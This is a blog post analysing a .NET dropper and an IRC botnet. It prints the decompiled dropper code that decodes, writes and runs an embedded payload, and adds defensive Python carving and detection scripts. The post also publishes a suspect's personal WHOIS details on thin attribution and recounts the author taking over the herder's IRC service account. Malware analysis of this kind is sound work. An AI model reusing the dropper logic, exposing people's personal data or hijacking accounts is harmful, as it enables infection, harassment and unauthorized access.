Malware Analysis: Herder Disclosure and Botnet Dissection

After monitoring MalwareDomainList.com, I noticed an interesting piece of malware showing up in the Recent Updates. It was hosted on OAST.com, which is a pretty high-traffic site. I grabbed a copy of the binary and loaded it into my VM. To my surprise, it was the first .NET dropper I had come across in the wild.

Tools Used

  • PEiD
  • Wireshark
  • ProcMon
  • Reflector
  • mIRC (yes, seriously lol)

Checking PE
I opened the dropper in PEiD, which identified it as a .NET assembly. Since .NET assemblies decompile cleanly, this made for a quick and easy reverse.

PEiD - Soulmate

Disassemble and Analyze
Since .NET can easily be decompiled, I launched Red Gate Reflector and opened the binary to see what's going on inside. The developer either lacks knowledge of obfuscation or simply prefers to do everything by hand: nothing is obfuscated, and the only "protection" is the hard-coded delimiter and key below. I went straight to Form1_Load, since that is more than likely the first code to execute.

Private Sub Form1_Load(ByVal sender As Object, ByVal e As EventArgs)
 ' Drop location: the user's %TEMP% directory
 Dim tempPath As String = Path.GetTempPath
 ' Read the running dropper itself, in full, as a binary string
 FileSystem.FileOpen(1, Application.ExecutablePath, OpenMode.Binary, _
     OpenAccess.Read, OpenShare.Shared, -1)
 Dim str2 As String = Strings.Space(CInt(FileSystem.LOF(1)))
 FileSystem.FileGet(1, str2, -1, False)
 FileSystem.FileClose(New Integer() { 1 })
 ' Split the file on the delimiter, take the part after it (index 1)
 ' and pass it with the hard-coded key to the decoding routine
 Dim str3 As String = Form1.t6CEBpl0pZRC46YkNNwiunb(Strings.Split(str2, _
     "@KSJDFSDKFJSDLFJSLKFjslkdfjlKSDJflkSJDflkjdfkjsdlk@", _
     -1, CompareMethod.Binary)(1), "kSjdflskdfj293857OLSKDjflkksdfj9827352lssjdf2983572o3ijLSKDfjlskjfsf")
 ' Write the decoded payload to %TEMP%\Out.exe and run it
 FileSystem.FileOpen(2, tempPath & "\Out.exe", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default, -1)
 FileSystem.FilePut(2, str3, -1, False)
 FileSystem.FileClose(New Integer() { 2 })
 Process.Start(tempPath & "\Out.exe")
 ' The dropper's own window never needs to show; it exits once the payload is running
 Me.Close()
End Sub

It is fairly straightforward:

1) Locates the TEMP path
2) Reads the executing assembly (itself) from disk
3) Splits the file on a long delimiter string and passes the part after it, along with a hard-coded key, to a decoding routine that yields the embedded binary
4) Writes the decoded binary to Out.exe in the TEMP path
5) Executes Out.exe and closes itself
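The same carve-and-decode logic, as an added Python example written for this write-up (it is not the dropper's code, nor the extractor I wrote in .NET). The delimiter and key are the ones from the decompiled code above. What t6CEBpl0pZRC46YkNNwiunb actually does to the blob is not shown on this page, so the script tries a couple of candidate decoders (raw bytes, and a repeating-key XOR, which is an assumption used only to make the sample work) and accepts whichever result validates as a PE file; in practice you would port the decompiled routine verbatim. The "dropper" it runs against is constructed in memory.

```python
"""Carve a payload embedded after a delimiter in a dropper, then validate it
as a PE. Example code added for this analysis; not the malware author's code.

Assumption (labelled): the real decoding routine is unknown from the page, so
candidate decoders are tried and the output is validated by PE magic bytes.
The repeating-key XOR below is a placeholder, not the dropper's cipher."""
import struct

# Delimiter and key copied from the decompiled Form1_Load
DELIMITER = b"@KSJDFSDKFJSDLFJSLKFjslkdfjlKSDJflkSJDflkjdfkjsdlk@"
KEY = b"kSjdflskdfj293857OLSKDjflkksdfj9827352lssjdf2983572o3ijLSKDfjlskjfsf"


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR (assumed candidate transform, not the real one)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_pe(data: bytes) -> bool:
    """True if data starts with an MZ header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 4 > len(data):
        return False
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


# Ordered list of transforms to try on the carved blob
CANDIDATE_DECODERS = {
    "identity": lambda d: d,
    "xor-repeating-key": lambda d: xor_repeating(d, KEY),
}


def carve_payload(dropper: bytes):
    """Mirror Strings.Split(file, DELIMITER)(1): take the segment after the first
    delimiter, try each decoder, return (decoder_name, payload) or None."""
    parts = dropper.split(DELIMITER)
    if len(parts) < 2:
        return None
    blob = parts[1]
    for name, decode in CANDIDATE_DECODERS.items():
        candidate = decode(blob)
        if looks_like_pe(candidate):
            return name, candidate
    return None


def build_minimal_pe() -> bytes:
    """Constructed stand-in payload: a DOS header with e_lfanew -> 'PE\\0\\0'."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    return bytes(dos) + b"PE\x00\x00" + b"\x00" * 20


def build_sample_dropper() -> bytes:
    """Constructed dropper image: a fake stub, the delimiter, then the
    XOR-encoded payload. Stands in for the real Soulmate dropper."""
    stub = b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"<stub .NET assembly bytes>"
    return stub + DELIMITER + xor_repeating(build_minimal_pe(), KEY)


if __name__ == "__main__":
    result = carve_payload(build_sample_dropper())
    if result is None:
        print("no payload found")
    else:
        name, payload = result
        print(f"decoder={name} payload_len={len(payload)}")
        # On a real sample you would write `payload` to Out.exe for the next step
```

Validating by PE magic rather than trusting the split is the important part: if the delimiter also occurred inside the payload, or the decoder were wrong, you would otherwise write garbage to disk and not notice until PEiD refused to open it.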

PEiD on the trojan binary
I wrote a quick .NET application to extract the embedded binary, reusing the decompiled code from the dropper. Running PEiD on the extracted Out.exe showed it was nothing more than a compressed, self-extracting executable.

PEiD - Trojan

I went ahead and extracted its contents with WinRAR and found two mIRC scripts, three text files, and an image.

Extract - Trojan

See crime.mrc

See ok.mrc

See image.jpg

Just by looking at crime.mrc you can tell what the trojan is going to do: it contains the instructions the backdoor follows once the mIRC client executes it.

Soulmate crime.mrc analysis
1) On start-up it runs the .st logic
2) It reads the text files and picks a random nickname, real name and ident from them
3) Sets a bunch of client settings
4) Connects to the UnderNet IRC network
5) Logs in to cservice (UnderNet's channel service) using the username shakay
6) Adds a bunch of nicknames (the herders) to its notify list
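Those steps are also what you would look for on the wire. Below is an added Python example, written for this write-up rather than taken from the bot or the post's tools, that parses raw IRC lines and flags the three behaviours above: a welcome from an undernet.org server, a login to cservice as shakay, and a JOIN to the #soulmate channel. The sample lines are constructed; the cservice login syntax (PRIVMSG x@channels.undernet.org :login user pass) is UnderNet's X service syntax and is assumed here, as the page only says the bot "logs in to cservice".

```python
"""Flag the Soulmate bot's IRC behaviour in captured client/server lines.
Example code added for this analysis, not the bot's script or the post's
tooling. Sample traffic below is constructed for the demo."""
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Indicators taken from crime.mrc as described above
BOT_CHANNEL = "#soulmate"
CSERVICE = "x@channels.undernet.org"   # assumed: UnderNet's X channel service
CSERVICE_USER = "shakay"


@dataclass
class IrcMessage:
    prefix: Optional[str]
    command: str
    params: List[str]


def parse_irc_line(line: str) -> IrcMessage:
    """Parse one RFC 1459-style line: [:prefix] COMMAND params [:trailing]."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    trailing = None
    if " :" in line:
        line, _, trailing = line.partition(" :")
    parts = line.split()
    if not parts:
        raise ValueError("empty IRC line")
    params = parts[1:]
    if trailing is not None:
        params.append(trailing)
    return IrcMessage(prefix, parts[0].upper(), params)


def indicators(lines) -> List[Tuple[str, str]]:
    """Return (indicator_name, raw_line) for every line matching bot behaviour."""
    hits = []
    for raw in lines:
        if not raw.strip():
            continue
        msg = parse_irc_line(raw)
        # Step 4: numeric 001 (RPL_WELCOME) from an UnderNet server
        if msg.command == "001" and msg.prefix and msg.prefix.lower().endswith(".undernet.org"):
            hits.append(("undernet-welcome", raw))
        # Step 5: login to cservice as the herder's registered user
        elif msg.command == "PRIVMSG" and len(msg.params) >= 2:
            target, text = msg.params[0].lower(), msg.params[1].lower()
            if target == CSERVICE and text.startswith(f"login {CSERVICE_USER} "):
                hits.append(("cservice-login", raw))
        # Joining the command channel named in crime.mrc
        elif msg.command == "JOIN" and msg.params and msg.params[0].lower() == BOT_CHANNEL:
            hits.append(("join-cnc-channel", raw))
    return hits


# Constructed sample capture (nick, ident, password and server name are made up)
SAMPLE_LINES = [
    "NICK xk2j9f",
    "USER q8w1 0 * :Random Name",
    ":Chicago.IL.US.Undernet.Org 001 xk2j9f :Welcome to the UnderNet IRC Network, xk2j9f",
    "PRIVMSG x@channels.undernet.org :login shakay hunter2",
    "JOIN #soulmate",
    ":wolf!~wolf@example.invalid PRIVMSG #soulmate :hello",
]

if __name__ == "__main__":
    for name, raw in indicators(SAMPLE_LINES):
        print(f"{name:20s} {raw}")
```

The cservice login line is worth a closer look in any capture: X logins travel as a plain PRIVMSG, so the herder's username and password are visible to anyone sniffing the bot, which is exactly how the password change later in this post was possible.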

Playing with the trojan
So, noticing how lame this botnet really looks on the inside, I fired up Wireshark and ProcMon. I launched the dropper and immediately saw IRC traffic, along with a nice image popping up. I would post the Wireshark capture, but it's pretty newbish.

ProcMon showed that the dropper did indeed save Out.exe, along with a bunch of other files marked hidden and system, into the TEMP path:

  • daemon.exe – a mIRC client binary
  • temporarly.reg – registry settings for start-up execution (persistence)
  • catchme.bat – a batch file that launches everything

The same folder also contained the extracted contents of the Trojan.

Developer Signature
Going back to the earlier .NET decompilation, I looked for a unique string that might help me identify the developer. The first one I tried was:

Google Search: Strings.Space(CInt(FileSystem.LOF(1)))

I jumped straight into Google and guess what I found? A Pastebin matching the string as the first result. Gotta love Google!

See String Match

The Pastebin code is a VB.NET binder/crypter that attempts to evade detection by many known applications, and it uses the same coding methodology as our dropper. Hmmm… who is this RiverThief guy that posted the Pastebin?

Let’s try out our friend, Google, again!

Google Search: riverthief malware

Google - RiverThief Malware

The thing I love about Google is how it caches sites. It looks like our RiverThief guy has some connection to writing undetectable malware and owns a botnet. Also in the results you notice two domains, www.riverthief.info and riverthief.co.cc. I went ahead and pulled the WHOIS registrant record for riverthief.info.

Registrant ID:CR40000685
Registrant Name:River Thief
Registrant Organization:
Registrant Street1:654 verginia lane
Registrant Street2:
Registrant Street3:
Registrant City:Houston
Registrant State/Province:Texas
Registrant Postal Code:77042
Registrant Country:US
Registrant Phone:+1.2814441585
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:riverthief@live.com

RiverThief Home

RiverThief - Phone

Playing on IRC
So I fired up mIRC, used some of the settings from the text files extracted earlier, and joined #soulmate, since that channel was named in crime.mrc. Immediately a user nicknamed "wolf" tried to issue commands to me. I sent him a private message refusing to comply. LOL! I then authenticated to cservice manually as the shakay user, logged into cservice's website, and changed shakay's password.

Wolf wasn't very happy. He kicked and banned me with some vulgar language, then invited me back into the channel, begging me to release the shakay username (which was registered to the email shakay@url.ro). All he had to do was reset the password.

Conclusion
Malware writers and bot herders seem to be using the same old tricks with newer technologies. This dropper needs the .NET Framework on the victim machine to work, but .NET is becoming more and more common, and it lets malware writers build droppers very easily. The person behind this one obviously didn't spend much time on it.

Chances are either some Romanian hacker grabbed RiverThief's VB.NET code and took a shot at it, or RiverThief is behind this botnet. Either way, it was rookie malware and simple to reverse.

All Tags: .Net, malware analysis, reverse engineer, soulmate botnet, trojan, VB.Net

2 Responses

03.17.10

Hey Mike. Very cool article. I am such a newbie at this. What I loved about this article is your thought process. The investigative techniques to backtrack. Love it.

Nice post. Thanks.
